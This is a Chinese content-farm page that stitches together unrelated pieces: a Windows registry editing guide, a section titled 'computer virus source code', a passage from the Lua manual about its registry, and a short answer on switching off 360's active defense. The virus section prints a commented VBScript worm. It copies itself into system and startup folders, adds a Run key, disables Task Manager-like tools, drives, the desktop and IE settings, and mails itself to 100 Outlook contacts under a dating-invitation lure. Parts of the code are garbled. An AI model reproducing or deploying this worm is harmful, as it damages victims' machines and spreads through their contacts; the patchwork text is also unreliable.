注册表主防源代码的简单介绍[20240424更新]

本篇文章给大家谈谈注册表主防源代码，以及对应的知识点，希望对各位有所帮助，不要忘了收藏本站喔。

本文目录一览：

• 1、注册表是什么？
• 2、电脑病毒源代码介绍
• 3、程序开发中的注册表怎么解释？
• 4、怎么修改注册表来关闭360主动防御, 最好用bat文件。麻烦高手写写 代码

注册表是什么？

对我们大多数人而言，注册表就像我们汽车上的密封垫片：我们知道它在那里，它至关重要而且我们感觉不到它的存在。就像一辆车的密封垫片如果不合适，那它就不能跑很远，错误的注册表可以终止Windows，甚至让它无法启动。但如果你知道你正在做什么，注册表会在高效处理方面成为你的重要的帮手。

该指南将告诉你该如何安全地编辑注册表以个性化你的计算机。也就是说，要明白注册表并不是Windows中可有可无的元素。一个错误的修改可以导致PC的崩溃，所以在你完整地读完这篇指南之前请不要尝试做任何修改。

即使目前你还缺乏做任何修改的自信，我们建议你往下读，在理解了注册表如何控制你的PC之后，将会扩展你各方面的计算机知识并且在以后可以帮助你修复各种问题。

并非所有修改都是好的

在我们开始之前，请允许我详细叙述我们对注册表进行修改的警告。注册表中包含的大多数信息对平稳运行Windows至关重要，修改或删除这些值会完全终止你的计算机。

另一项需要记住的重要事情是对注册表的任何修改输入之后，它们就开始发生作用。注册表和Word文档不一样，Word是你必须选择保存，而且也没有撤销功能。这里不是可以胡乱进行修补的地方，但是有一个很容易就实施的保险策略。和其他类型的数据一样，注册表信息可以被备份，创建一个拷贝从而如果出现问题就可以进行恢复。

实际上，注册表非常重要，以至于Windows在每次开始的时候都会自动对它进行备份。Windows可以利用该备份自动修复某些问题，但你所做的多数修改都需要你自己来修复。

在进行修改之前，最简单的保护自己的方法是创建一个系统恢复点，这让注册表在某个点建立单独的、不可修改的记录，如果需要你可以返回到这个点。

你或许还希望用笔和纸记下你对注册表所作的所有修改。虽然计算机没有完全停止工作，你可能想撤销某些修改，而且很容易就可以实现这一点，只需通过快速查阅记录，而不必恢复整个注册表。

注册表的任务是什么？

考虑到这些警告，你可能奇怪注册表真正做了什么，以及为什么所有人都想胡乱地修补它。它是所有和Windows以及你在计算机上安装的软件、硬件相关的设置和信息的一个中央记录。在Windows 95之前，这些信息被保存在大量不同的文本文件当中。它们很容易被编辑，而你首先必须要找到它们，而且在你编程试图和它们进行交互的时候经常会发生问题。

注册表的一个好处是添加或删除程序功能，这是开始菜单中控制面板功能的一部分。你安装软件的时候，在注册表中做了一个记录，所以在添加或删除程序中作为一个专门列表的一部分出现。

注册表的功能是什么？

注册表保存在你的硬盘的几个文件当中，但访问和修改它们的唯一途径是使用注册表编辑器程序。要访问它，点击开始按钮，然后点击运行。在出现的对话框中输入regedit并按Enter键。这会进入注册表编辑器，你现在就看到了注册表。

注册表组织得更像磁盘上的文件，如果你曾经在Windows浏览器中使用过文件夹视图的话，你会根据很熟悉。然而在注册表中，这些文件夹被称为键。要打开某个键，只需点击它旁边的小加号(+)。然后你会看到每个键下包含更多的键，称为子键或值。

这些数以千计的键根据逻辑进行排列，在你第一次看到注册表的时候可能会使你感觉无从下手。要把头绪理清楚，首先要知道有五个根键以及注册表的基本组成结构。

值是指各种不同键的单独设置，因此是可自定义的。它们在注册表窗口左侧以名称排列，它们还说明了包含数据的类型以及数据本身。不用担心使用的是哪种数据类型，因为这对数据本身是明显的，或者在编辑过程中会作出解释。

修改注册表

你肯定已经对注册表作过修改，但只是通过控制面板或安装其它软件这样的间接途径。第三方软件也可以实现这一点，但你应该只使用那些值得信任的软件。让某个不知名的应用程序编辑注册表可能会给间谍软件留下后门。

一些可用的软件提供了你在别的地方看不到的设置。Registry Mechanic就是这样一个程序。其他诸如Norton SystemWorks这样的工具可以扫描注册表中不再需要并且可以删除的键值。注册表越庞大，你的计算机的运行就会变得越慢，所以SystemWorks非常有用。

间谍软件通常在注册表中建立键值以确保自己已经启动以便在Windows开始的时候监视你的计算机。在寻找有关如何删除这些程序的建议的时候，你可能会被告知需要编辑注册表。请先确定该建议是来自某个可信赖的来源，例如Windows的注册表指南或Systweak.com。

在有些时候，间谍软件也安装一个小程序以监视注册表并且重新写入你删除的键值，所以你应该使用诸如Spybot Search and Destroy这样的软件完全地清理你的计算机。

你可以通过注册表做些什么

如果你了解了注册表的基本工作原理，你可以很快地调整计算机的行为以适应你的个人需求。你还可以像在Internet Explorer中那样在注册表中设置收藏夹。如果你正在修改一个需要进行调整的设置，例如在下面例子中，你可以利用这个特性快速返回到你修改的值。

要设置收藏夹，点击键，然后是收藏夹菜单并选择添加收藏夹。给定一个名称并点击OK。回到这个键，你现在可以很容易地从收藏夹菜单中选择收藏。

需要注意的是十进制和十六进制数之间的区别，同样一个数字在这两者中将产生不同的结果。这里的所有例子都使用十进制数。

掌握缩略图

Windows可以在资源管理器的窗口中显示图像为缩略图。如果你感觉这些缩略图的大小或质量不是你喜欢的，你可以利用注册表修改它们。首先，通过创建一个系统恢复点做一个文件备份。现在使用前面介绍的过程打开注册表并且通过点击“+”寻找到下面的键。

现在右击资源管理器图标，选择New并点击DWORD值。在看到NewValue1之后输入文本ThumbnailQuality。你应该只能输入源名称；如果不是，点击新键并按F2以编辑该名称。右击ThumbnailQuality并选择修改。在出现的窗口中，输入一个介于50到100的数字以指定缩略图的质量。默认值是90。该数字越小，图片显示的速度会越快，但是图片显示的质量会越低。点击十进制选项，然后点击OK。

要改变缩略图的大小，右击资源管理器的图标，选择New并点击DWORD值。命名新的值ThumbnailSize，右击它并选择修改。输入一个数字以设置你希望每个缩略图使用的象素数量。默认值是96。点击十进制选项，然后点击OK。在这些修改生效前，你可能需要重新启动计算机。

清除IE历史web站点

尽管我们可以在Internet Explorer中删除你曾经访问过的web站点的历史列表，但系统仍然保存着它们并且当你在地址栏中输入相同的名称时自动显示它们。这个列表被保存在注册表中，如果你愿意你可以删除它。

点击开始按钮，然后点击运行，在窗口中输入regedit并按enter键。接着查找键“HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs”。在右边的窗格中，你将看到曾经访问的所有web站点的列表。要删除该列表中的web站点，点击每一行并按Del键。点击Yes，该记录将被删除。

禁用任务管理器

在处理没有响应的程序时，任务管理器非常有用，但是有时候你可能希望防止其他人使用它，以避免他们停止某个关键的程序，例如你正在运行的病毒扫描器。但是需要了解的是，因为你可以停止任何正在运行的程序，所以稍不注意就很容易导致Windows崩溃。你可以通过下面的方法修改注册表，禁止其他人访问任务管理器：

点击开始按钮，然后是运行。在接下来的窗口中输入regedit并按Enter键。找到下面的键：‘HKEY_CURRENT_USER\Software\Microsoft\Windows\ CurrentVersion\Policies\System’。你需要创建一个System键。右击Policies，选择New，然后点击Key。输入键的名字System。

右击System键，选择New，然后点击DWORD值。输入值的名称为DisableTaskMgr。如果你无法输入名称，左击新的值并在输入新的名称之前按F2键。右击它并选择修改。在值的数据对话框中输入1，选择十进制选项并点击OK。

现在，如果某人通过按下Ctrl+Alt+Del试图打开任务管理器，他们将收到一条消息，告诉他们这已经被禁止了。如果你的计算机上的用户不止一个，你就必须以每个帐户登录，然后重复这个过程。

小心对待它

我们已经用一些例子说明了你可以利用注册表做些什么。随着你更多地学习，你会发现了解你的计算机是如何与注册表相结合是一个很有用的工具，从长远的观点来看会增强你的自信。

通过下面的指导，我希望你能够获得对你的计算机的进一步的理解。需要记住的是，一定要尽可能心怀敬意地对待注册表并且在做修改的时候小心谨慎。一定要先做一个备份并且只在你确切地知道它们是什么以及它们是做什么的时候才修改或添加值。

去了解更多

有大量的web站点介绍如何编辑注册表以及注册表能做些什么。如果你不确定某个特定的修改，你可以到互联网的论坛上和其他用户进行讨论，例如Computeractive论坛。

要想获得更多对注册表进行修改的例子，请查看WinGuides Network for Windows。每项技巧都有你需要修改的键和值的截屏以及它们的外部特征。你也可以下载WinGuides Tweak Manager，它无需使用注册表就可以应用这些修改。

如果你觉得有足够的把握，请查看Windows XP的The Elder Geek。该站点有大量的建议，并且即使你不是在寻找特定的注册表编辑，你或许会发现你希望进行的修改，而你一直不知道该如何实现。

电脑病毒源代码介绍

电脑中了病毒想从它的源代码入手怎么办呢!有我在，下面由我给你做出详细的电脑病毒源代码介绍!希望对你有帮助!

电脑病毒源代码介绍：

电脑病毒源代码一：

on error resume next

set fs=createobject("ing.filesystemobject" '创建一个能与 操作系统 沟通的对象,再利用该对象的各种 方法 对注册表进行操作

set dir1=fs.getspecialfolder(0) '获取windows/winnt文件夹位置

set dir2=fs.getspecialfolder(1) '获取system32/system文件夹位置

set so=createobject("ing.filesystemobject"

dim r '定义一个变量

set r=createobject("w.shell"

so.getfile(w.fullname).copy(dir1"\win32system.vbs" '复制病毒副本到windows/winnt文件夹位置

so.getfile(w.fullname).copy(dir2"\win32system.vbs" '复制病毒副本到system32/system文件夹位置

so.getfile(w.fullname).copy(dir1"\start menu\programs\启动\win32system.vbs" '复制病毒副本到start menu启动菜单

'下面是对注册表的恶意修改和简单的依靠oe传播

r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\norun",1,"reg_dword" '修改注册表，禁止“运行”菜单

r.regwrite "kcu\software\microsoft\windows\currentversion\policies\explorer\noclose",1,"reg_dword" '修改注册表，禁止“关闭”菜单

r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nodrives",63000000,"reg_dword" '修改注册表，隐藏所有逻辑盘符

r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\system\disableregistrytools",1,"reg_dword" '修改注册表，禁止注册表编辑

r.regwrite "hklm\software\microsoft\windows\currentversion\run\scanregistry","" '修改注册表，禁止开机注册表扫描

r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nologoff",1,"reg_dword" '修改注册表，禁止“注销”菜单

r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\winoldapp\norealmode",1,"reg_dword" '修改注册表，禁止ms-dos实模式

r.regwrite "hklm\software\microsoft\windows\currentversion\run\win32system","win32system.vbs" '修改注册表，使这个脚本本身开机自动运行

r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nodesktop",1,"reg_dword" '修改注册表，禁止显示桌面图标

r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\winoldapp\disabled",1,"reg_dword" '修改注册表，禁止纯dos模式

r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nosettaskbar",1,"reg_dword" '修改注册表，禁止“任务栏和开始”菜单

r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\noviewcontextmenu",1,"reg_dword" '修改注册表，禁止右键菜单

电脑病毒源代码二：

r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nosetfolders",1,"reg_dword" '修改注册表，禁止控制面板

r.regwrite "hklm\software\classes\.reg\","txtfile" '修改注册表，禁止导入使用.reg文件，改为用txt文件的关联

r.regwrite "hklm\software\microsoft\windows\currentversion\winlogon\legalnoticecaption","警告" '设置开机提示框标题

r.regwrite "hklm\software\microsoft\windows\currentversion\winlogon\legalnoticetext","您中vbs脚本病毒了，哭吧~" '设置开机提示框文本内容

set ol=createobject("outlook.application" '创建outlook文件对象用于传播

on error resume next

for x=1 to 100

set mail=ol.createitem(0)

mail.to=ol.getnamespace("mapi".addresslists(1).addressentries(x) '用于向地址簿的前100名发送此 vbs病毒，可以算是简单弱智的蠕虫了吧~~

mail.subject="今晚你来吗?" '邮件主题

mail.body="朋友你好：您的朋友rose给您发来了热情的邀请。具体情况请阅读随信附件，祝您好运! 同城约会网" '邮件内容

mail.attachments.add(dir2"win32system.vbs"

mail.send

next

ol.quit

'下面是对internet explore 选项的恶意修改

r.regwrite "hkcu\software\policies\microsoft\internet explorer\restrictions\nobrowsercontextmenu",1,"reg_dword" '修改注册表，禁止鼠标右键

r.regwrite "hkcu\software\policies\microsoft\internet explorer\restrictions\nobrowseroptions",1,"reg_dword" '修改注册表，禁止internet选项

r.regwrite "hkcu\software\policies\microsoft\internet explorer\restrictions\nobrowsersaveas",1,"reg_dword" '修改注册表，禁止“另存为”

r.regwrite "hkcu\software\policies\microsoft\internet explorer\restrictions\nofileopen",1,"reg_dword" '修改注册表，禁止“文件/打开”菜单

r.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\advanced",1,"reg_dword" '修改注册表，禁止更改高级页设置

r.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\cache internet",1,"reg_dword" '修改注册表，禁止更改临时文件设置

r.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\autoconfig",1,"reg_dword" '修改注册表，禁止更改自动配置

r.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\homepage",1,"reg_dword" '修改注册表，禁止更改主页，即“主页”变灰

r.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\history",1,"reg_dword" '修改注册表，禁止更改历史记录设置

r.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\connwiz admin lock",1,"reg_dword" '修改注册表，禁止更改internet连接向导

r.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\securitytab",1,"reg_dword" '修改注册表，禁止更改安全项

r.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\resetwebsettings",1,"reg_dword" '修改注册表，禁止“重置web设置”

r.regwrite "hkcu\software\policies\microsoft\internet explorer\restrictions\noviewsource",1,"reg_dword" '修改注册表，禁止查看源文件

r.regwrite "hkcu\software\policies\microsoft\internet explorer\infodelivery\restrictions\noaddingsubions",1,"reg_dword" '修改注册表，禁止添加脱机计划

程序开发中的注册表怎么解释？

在程序开发中预定义出来的表就是注册表。

提供了一个 注册表， 这是一个预定义出来的表， 可以用来保存任何 C 代码想保存的 Lua 值。 这个表可以用有效伪索引 LUA_REGISTRYINDEX 来定位。 任何 C 库都可以在这张表里保存数据， 为了防止冲突，你需要特别小心的选择键名。 一般的用法是，你可以用一个包含你的库名的字符串做为键名， 或者取你自己 C 对象的地址，以轻量用户数据的形式做键， 还可以用你的代码创建出来的任意 Lua 对象做键。 关于变量名，字符串键名中以下划线加大写字母的名字被 Lua 保留。

注册表中的整数键用于引用机制 （）， 以及一些预定义的值。 因此，整数键不要用于别的目的。

当你创建了一个新的 Lua 状态机， 其中的注册表内就预定义好了几个值。 这些预定义值可以用整数索引到， 这些整数以常数形式定义在 lua.h 中。 有下列常数：

LUA_RIDX_MAINTHREAD: 注册表中这个索引下是状态机的主线程。 （主线程和状态机同时被创建出来。）

LUA_RIDX_GLOBALS: 注册表的这个索引下是全局环境。

在内部实现中，Lua 使用了 C 的 longjmp 机制来处理错误。 （如果你使用 C++ 编译，Lua 将换成异常； 细节请在源代码中搜索 LUAI_THROW。） 当 Lua 碰到任何错误 （比如内存分配错误、类型错误、语法错误、还有运行时错误） 它都会 抛出一个错误出去； 也就是调用一次长跳转。 在 保护环境 下， Lua 使用 setjmp 来设置一个恢复点； 任何发生的错误都会跳转到最近的一个恢复点。

如果错误发生在保护环境之外， Lua 会先调用 panic 函数 （） 然后调用 abort 来退出宿主程序。 你的 panic 函数只要不返回 （例如：长跳转到你在 Lua 外你自己设置的恢复点） 就可以不退出程序。

panic 函数以错误消息处理器（）的方式运行； 错误消息在栈顶。 不同的是，它不保证栈空间。 做任何压栈操作前，panic 函数都必须先检查是否有足够的空间 （）。

大多数 API 函数都有可能抛出错误， 例如在内存分配错误时就会抛出。 每个函数的文档都会注明它是否可能抛出错误。

在 C 函数内部，你可以通过调用 lua_error 来抛出错误。

怎么修改注册表来关闭360主动防御, 最好用bat文件。麻烦高手写写 代码

这还用bat?360不是有开机启动加速吗，从那里的服务选项卡里禁用掉就行，其他不想启动的也可以从哪里禁用

关于注册表主防源代码和的介绍到此就结束了，不知道你从中找到你需要的信息了吗 ？如果你还想了解更多这方面的信息，记得收藏关注本站。